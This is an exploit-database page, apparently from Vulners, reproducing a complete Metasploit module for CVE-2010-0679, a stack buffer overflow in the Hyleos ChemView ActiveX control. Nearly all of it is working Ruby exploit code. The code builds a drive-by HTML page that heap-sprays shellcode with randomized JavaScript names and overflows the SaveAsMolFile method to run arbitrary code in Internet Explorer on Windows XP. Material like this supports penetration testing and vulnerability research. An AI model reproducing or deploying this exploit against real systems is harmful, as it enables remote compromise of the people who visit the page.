Hyleos ChemView ActiveX Control Stack Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Hyleos ChemView ActiveX Control Stack Buffer Overflow This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos ChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods with an overly long first argument, an attacker can overrun a buffer and execute arbitrary code


                                                ##
# $Id: hyleos_chemviewx_activex.rb 9935 2010-07-27 02:25:15Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = GoodRanking # heap spray :-/

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Hyleos ChemView ActiveX Control Stack Buffer Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos
				ChemView (HyleosChemView.ocx). By calling the &#39;SaveAsMolFile&#39; or &#39;ReadMolFile&#39; methods
				with an overly long first argument, an attacker can overrun a buffer and execute
				arbitrary code.
			},
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Author&#39;         =&#62;
				[
					&#39;Paul Craig &#60;paul.craig[at]security-assessment.com&#62;&#39;, # original discovery/advisory
					&#39;Dz_attacker &#60;dz_attacker[at]hotmail.fr&#62;&#39;, # original file format module
					&#39;jduck&#39;   # converted HttpServer module
				],
			&#39;Version&#39;        =&#62; &#39;$Revision: 9935 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2010-0679&#39; ],
					[ &#39;OSVDB&#39;, &#39;62276&#39; ],
					[ &#39;URL&#39;, &#39;http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf&#39; ],
					[ &#39;URL&#39;, &#39;http://www.exploit-db.com/exploits/11422/&#39; ]
				],
			&#39;DefaultOptions&#39; =&#62;
				{
					&#39;EXITFUNC&#39; =&#62; &#39;process&#39;,
					&#39;InitialAutoRunScript&#39; =&#62; &#39;migrate -f&#39;,
				},
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;         =&#62; 1024,
					&#39;BadChars&#39;      =&#62; &#34;\x00&#34;,
					&#39;StackAdjustment&#39; =&#62; -3500,
				},
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;Targets&#39;        =&#62;
				[
					[ &#39;Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0&#39;, { &#39;Ret&#39; =&#62; 0x0A0A0a0A, &#39;Offset&#39; =&#62; 150 } ]
				],
			&#39;DisclosureDate&#39; =&#62; &#39;Feb 10 2010&#39;,
			&#39;DefaultTarget&#39;  =&#62; 0))
	end

	def autofilter
		false
	end

	def check_dependencies
		use_zlib
	end

	def on_request_uri(cli, request)

		clsid = &#34;C372350A-1D5A-44DC-A759-767FC553D96C&#34;
		progid = &#34;HyleosChemView.HLChemView&#34;

		methods = [ &#34;ReadMolFile&#34;, &#34;SaveAsMolFile&#34; ]
		method = methods[rand(methods.length)]
		method = &#34;SaveAsMolFile&#34;

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# It may be possible to create a more robust exploit, however --
		# 1. The control&#39;s base address has been shown to vary (seen at 0x1c90000 and 0x1d90000)
		# 2. The buffer overflow does not appear to be entirely straight forward.

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(p.encoded, Rex::Arch.endian(target.arch))

		# Setup exploit buffers
		nops 	  = Rex::Text.to_unescape([target.ret].pack(&#39;V&#39;))
		ret  	  = Rex::Text.uri_encode([target.ret].pack(&#39;L&#39;))
		blocksize = 0x40000
		fillto    = 300
		offset 	  = target[&#39;Offset&#39;]

		# Randomize the javascript variable names
		chemview     = rand_text_alpha(rand(100) + 1)
		j_shellcode  = rand_text_alpha(rand(100) + 1)
		j_nops       = rand_text_alpha(rand(100) + 1)
		j_ret        = rand_text_alpha(rand(100) + 1)
		j_headersize = rand_text_alpha(rand(100) + 1)
		j_slackspace = rand_text_alpha(rand(100) + 1)
		j_fillblock  = rand_text_alpha(rand(100) + 1)
		j_block      = rand_text_alpha(rand(100) + 1)
		j_memory     = rand_text_alpha(rand(100) + 1)
		j_counter    = rand_text_alpha(rand(30) + 2)

		content = %Q|&#60;html&#62;
&#60;object classid=&#39;clsid:#{clsid}&#39; id=&#39;#{chemview}&#39;&#62;&#60;/object&#62;
&#60;script&#62;
#{j_shellcode}=unescape(&#39;#{shellcode}&#39;);
#{j_nops}=unescape(&#39;#{nops}&#39;);
#{j_headersize}=20;
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
while(#{j_nops}.length&#60;#{j_slackspace})#{j_nops}+=#{j_nops};
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
while(#{j_block}.length+#{j_slackspace}&#60;#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
#{j_memory}=new Array();
for(#{j_counter}=0;#{j_counter}&#60;#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};

var #{j_ret}=&#39;&#39;;
for(#{j_counter}=0;#{j_counter}&#60;=#{offset};#{j_counter}++)#{j_ret}+=unescape(&#39;#{ret}&#39;);
#{chemview}.#{method}(#{j_ret});
&#60;/script&#62;
&#60;/html&#62;|


		print_status(&#34;Sending exploit to #{cli.peerhost}:#{cli.peerport}...&#34;)

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1